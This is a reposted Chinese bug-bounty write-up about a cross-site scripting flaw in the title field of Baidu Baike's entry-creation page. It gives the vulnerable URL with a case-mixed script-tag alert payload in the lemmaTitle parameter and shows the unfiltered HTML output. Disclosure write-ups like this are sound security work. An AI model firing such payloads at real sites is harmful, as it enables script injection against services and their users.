往年公开:实战src挖掘 XX漏洞挖掘(一、XX词条)

admin 2023年12月31日21:21:31评论28 views字数 448阅读1分29秒阅读模式

往年公开:实战src挖掘 XX漏洞挖掘(一、XX词条)

发现方式:XX创建词条,然后标题处存在xss漏洞

漏洞链接 :

https://baike.baidu.com/page/createindex?lemmaTitle=

往年公开:实战src挖掘 XX漏洞挖掘(一、XX词条)

这里可以直接插入xss代码,或者链接后插入

https://baike.baidu.com/page/createindex?lemmaTitle=<sCriPt>alert(/xss/)</sCripT>/

往年公开:实战src挖掘 XX漏洞挖掘(一、XX词条)

 然后呢,点击浏览,会弹出。标题是没有经过任何的过滤的

往年公开:实战src挖掘 XX漏洞挖掘(一、XX词条)


往年公开:实战src挖掘 XX漏洞挖掘(一、XX词条)

看下,代码

<h1 ><sCriPt>alert(/xss/)</sCripT></h1>

往年公开:实战src挖掘 XX漏洞挖掘(一、XX词条)

是没有任何过滤和限制的,。

然后在提交一下,在我的词条处点击查看,还是会弹窗,证明词条标题处是没有过滤的

https://baike.baidu.com/usercenter/lemmas#auditing


往年公开:实战src挖掘 XX漏洞挖掘(一、XX词条)

往年公开:实战src挖掘 XX漏洞挖掘(一、XX词条)


转载至:https://codeantenna.com/a/TrDWBWRDkV

文章作者:白昼小丑


原文始发于微信公众号(Ots安全):往年公开:实战src挖掘 XX漏洞挖掘(一、XX词条)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年12月31日21:21:31
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   往年公开:实战src挖掘 XX漏洞挖掘(一、XX词条)https://cn-sec.com/archives/2352919.html

发表评论

匿名网友 填写信息